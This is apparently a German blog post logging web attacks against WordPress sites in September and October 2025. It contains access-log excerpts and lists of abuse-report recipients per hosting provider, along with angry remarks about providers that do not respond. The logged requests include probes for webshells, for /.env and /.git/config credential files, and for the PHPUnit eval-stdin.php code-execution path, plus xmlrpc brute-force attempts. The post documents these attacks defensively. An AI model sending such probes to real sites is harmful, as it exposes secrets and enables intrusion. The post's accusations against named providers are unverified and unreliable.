20.163.114.9 website*x.com – – [06/Oct/2025:01:19:28 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:28 +0200] „GET /classwithtostring.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:29 +0200] „GET /cong.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:29 +0200] „GET /edit.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:29 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:30 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:30 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:30 +0200] „GET /gecko.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:30 +0200] „GET /goat.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:31 +0200] „GET /goods.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:31 +0200] „GET /ioxi-o.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:31 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:32 +0200] „GET /makeasmtp.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:32 +0200] „GET /mm.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:32 +0200] „GET /nc4.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:33 +0200] „GET /tinyfilemanager.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:33 +0200] „GET /users.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:33 +0200] „GET /w.php HTTP/1.0“ 302 – „-“ „-“
… and so on… and so on…!!!
+
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:46 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:49 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:54 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:55 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:56 +0200] „GET /adminfuns.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:57 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:47:58 +0200] „GET /asasx.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:00 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:01 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:01 +0200] „GET /cgi-bin/ HTTP/1.0“ 403 262 „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:01 +0200] „GET /classwithtostring.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:02 +0200] „GET /cong.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:03 +0200] „GET /edit.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:04 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:05 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:06 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:08 +0200] „GET /images/index.php HTTP/1.0“ 403 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:08 +0200] „GET /info.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:09 +0200] „GET /moon.php HTTP/1.0“ 403 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:09 +0200] „GET /nc4.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:10 +0200] „GET /wp-admin/css/colors/blue/index.php HTTP/1.0“ 302 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:11 +0200] „GET /wp-admin/includes/ HTTP/1.0“ 403 – „-“ „-“
51.57.63.112 website*x.com – – [06/Oct/2025:03:48:11 +0200] „GET /wp-content/index.php HTTP/1.0“ 403 – „-“ „-“
… and so on… and so on…!!!

Leider reagieren zu viele Provider absolut nicht, mit dieser UNTÄTIGKEIT mutieren solche Provider immer mehr zum SUPPORTER FÜR DIESE DUMMEN HACKER-IDIOTEN!

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

Schauen wir nun mal, welcher PROVIDER WIRKLICH VERANTWORTUNGSBEWUSST REAGIERT!

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für all diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll September 2025

Das Hacker Protokoll September 2025

Dieses Hacker Protokoll September 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll September 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom September . Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

Verantwortungsvolle Provider schliessen diese SICHERHEITSLÜCKEN in den entsprechenden Websites/Server nach unserer Meldung unverzüglich!

HIER NUN EIN PAAR PROTOKOLL-AUSZÜGE – ABUSE-MELDUNGEN vom WOCHENENDE AB 26. SEPTEMBER 25!

Wie jedes Wochenende auch hier mal wieder unzählige dumme Hacking-Versuche, beginnend vom Wochenende ab dem 26 September.

Hier ein paar Auszüge dazu, dessen Abuse-Mails MIT ENTSPRECHENDER BEMERKUNG an die MIT VERANTWORTLICHEN PROVIDER heute am Montag-Vormittag nun rausgehen:

MAIL NR. 1 – Hacker-Idiots from WEEKEND!

newoeste@gmail.com,renato@newoeste.com.br,mail-abuse@cert.br,buse@lacnic.net,virtua@virtua.com.br,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de

AS264321 – NEW OESTE TELECOMUNICACOES – AGAIN AND AGAIN EVERY WEEKEND! – VERY IGNORANT AND UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
newoeste@gmail.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
138.122.152.142 website*x.com – – [26/Sep/2025:15:56:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS28573 – Claro NXT Telecomunicacoes – AGAIN AND AGAIN EVERY WEEKEND! – VERY IGNORANT AND UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@lacnic.net,virtua@virtua.com.br – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2804:14c:124:a2ac:9174:9a75:8d5c:d6d website*x.com – – [26/Sep/2025:16:06:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS51167 – Contabo GmbH – AGAIN AND AGAIN! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.195.87.55 website*x.com – – [27/Sep/2025:05:17:12 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://website*x.com/wp-admin/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_5) Gecko/20100101 Firefox/128.0“

MAIL NR. 2 – Hacker-Idiots from WEEKEND!

abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@virtualsolution.net,abuse@asiatech.ir,abuse@dianahost.com.bd,abuse@dianahost.com

AS14618 – Amazon.com, Inc. – HERE WITH 3 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
trustandsafety@support.aws.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
44.193.57.42 website*x.com – – [27/Sep/2025:05:33:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
+
3.136.214.141 website*x.com – – [27/Sep/2025:06:01:59 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
+
52.221.97.93 website*x.com – – [27/Sep/2025:12:48:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“

AS49367 – Seflow s.r.l. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualsolution.net
89.40.227.248 website*x.com – – [27/Sep/2025:06:15:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“

AS43754 – Asiatech Data Transmission company – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@asiatech.ir – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
46.245.76.52 website*x.com – – [27/Sep/2025:06:23:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

AS148993 – Diana Host Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@dianahost.com.bd
103.169.160.74 website*x.com – – [27/Sep/2025:06:37:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 3 – Hacker-Idiots from WEEKEND!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,admin@idcloudhost.com,abuse@ineonet.com

AS51167 – Contabo GmbH – NEXT ONE AT SATURDAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
207.180.203.50 website*x.com – – [27/Sep/2025:07:11:17 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

AS136052 – PT Cloud Hosting Indonesia – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@idcloudhost.com
103.31.38.163 website*x.com – – [27/Sep/2025:07:15:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

AS197492 – ALSATIS SERVICES SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ineonet.com
185.49.20.75 website*x.com – – [27/Sep/2025:07:28:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 4 – Hacker-Idiots from WEEKEND!

abuse@hetzner.com,abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@hudsonvalleyhost.com

Hudson Valley Host
abuse@hudsonvalleyhost.com
107.172.243.11 website*x.com – – [27/Sep/2025:07:35:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“

AS16509 – Amazon.com, Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
trustandsafety@support.aws.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
13.50.0.57 website*x.com – – [27/Sep/2025:08:07:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

MAIL NR. 5 – Hacker-Idiots from WEEKEND!

dmzhostabuse@gmail.com,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,abuse@cheapy.host

AS48090 – TECHOFF SRV LIMITED – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dmzhostabuse@gmail.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
195.178.110.155 website*x.de – – [27/Sep/2025:02:13:35 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
195.178.110.155 website*x.de – – [27/Sep/2025:02:13:35 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“

AS141995 – Contabo Asia Private Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.233.83.146 website*x.de – – [27/Sep/2025:06:12:18 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
194.233.83.146 website*x.de – – [27/Sep/2025:06:12:19 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“

MAIL NR. 6 – Hacker-Idiots from WEEKEND!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,google-cloud-compliance@google.com, network-abuse@google.com,report@abuseradar.com

AS51167 – Contabo GmbH – NUMBER 3 AT SATURDAY!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!!!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.233.83.146 website*x.com – – [27/Sep/2025:03:39:49 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
194.233.83.146 website*x.com – – [27/Sep/2025:03:39:50 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
+
207.180.232.187 website*x.com – – [27/Sep/2025:05:43:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

AS396982 – Google LLC – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
35.240.215.118 website*x.com – – [27/Sep/2025:04:53:01 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F)“
35.240.215.118 website*x.com – – [27/Sep/2025:04:53:01 +0200] „GET /wordpress/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F)“
+
34.93.16.66 website*x.com – – [27/Sep/2025:06:11:20 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“

AS55470 – Cyfuture India Pvt. Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
163.5.191.32 website*x.com – – [27/Sep/2025:06:04:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

MAIL NR. 7 – Hacker-Idiots from WEEKEND!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,IARPOC@Newfold.com, abuse@hidata.org,abuse@aminidc.com

AS16276 – OVH SAS – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ONLY 1 ANSWER IN OUR ABUSE EMAILS! – NO MORE INFO!
51.195.68.11 website*x.com – – [27/Sep/2025:04:58:12 +0200] „GET /assets/images/accesson.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.195.68.11 website*x.com – – [27/Sep/2025:04:58:12 +0200] „GET /images/images/cache.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
+
15.235.207.224 website*x.com – – [27/Sep/2025:06:10:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

AS46606 – Unified Layer
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.214.121.103 website*x.com – – [27/Sep/2025:05:35:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

AS197937 – Mizban Dadeh Roham Co – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hidata.org
185.222.163.90 website*x.com – – [27/Sep/2025:05:50:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“

AS48147 – Asre Pardazeshe Ettelaate Amin Institute – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@aminidc.com
62.60.197.3 website*x.com – – [27/Sep/2025:06:17:42 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“

MAIL NR. 8 – Hacker-Idiots from WEEKEND!

abuse@hetzner.com,noc@imsbiz.com,pmaster@netvigator.com,abuse@le34.dk

AS4760 – HKT Limited – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc@imsbiz.com
58.153.170.129 www.website*x.com – – [27/Sep/2025:05:15:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
58.153.170.129 www.website*x.com – – [27/Sep/2025:05:15:56 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS24940 – Hetzner Online GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
abuse@hetzner.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! THIS IS VERY GOOD!
2a01:4f9:3a:139d::2 www.website*x.com – – [27/Sep/2025:05:20:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
2a01:4f9:3a:139d::2 www.website*x.com – – [27/Sep/2025:05:20:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS31027 – GlobalConnect A/S – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@le34.dk
185.199.236.107 www.website*x.com – – [27/Sep/2025:05:24:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
185.199.236.107 www.website*x.com – – [27/Sep/2025:05:24:27 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 9 – Hacker-Idiots from WEEKEND!

alexnvis@gmail.com,abuse@reliablesite.net,hm-changed@vnnic.vn

AS197566 – Livady s.r.o. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
alexnvis@gmail.com
91.224.90.83 website*x.com – – [27/Sep/2025:06:25:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“

AS23470 – ReliableSite.Net LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@reliablesite.net – IS NOW ANSWERED IN OUR ABUSE EMAILS AND WILL GIVE MORE INFORMATION LATER! THIS IS VERY GOOD!
209.222.98.137 website*x.com – – [27/Sep/2025:06:45:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“

AS135905 – VIETNAM POSTS AND TELECOMMUNICATIONS GROUP – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VIETNAM AGAIN AND AGAIN EVERY DAY! VERY IGNORANT AND COMPLETE UNWANTED!!!
hm-changed@vnnic.vn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.166.182.115 website*x.com – – [27/Sep/2025:06:58:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 10 – Hacker-Idiots from WEEKEND!

abuse.es@masorange.es,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,support@5gn.com.au

AS12479 – Orange Espagne SA – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.es@masorange.es – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
85.50.156.240 website*x.com – – [27/Sep/2025:06:25:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“

AS133480 – 5G NETWORK OPERATIONS PTY LTD – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
support@5gn.com.au – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
203.209.212.46 website*x.com – – [27/Sep/2025:08:36:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ONLY 1 ANSWER IN OUR ABUSE EMAILS! – NO MORE INFO!
2001:41d0:701:1100::11e3 website*x.com – – [27/Sep/2025:09:22:35 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

MAIL NR. 11 – Hacker-Idiots from WEEKEND!

cert.opl@orange.com,abuse@cheapy.host,abuse@nybula.com

AS5617 – Orange Polska Spolka Akcyjna – 195.116.0.0/15 IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
cert.opl@orange.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
195.117.36.241 website*x.com – – [27/Sep/2025:13:38:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“

AS401120 – cheapy.host LLC – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
196.251.84.218 website*x.com – – [28/Sep/2025:01:13:02 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
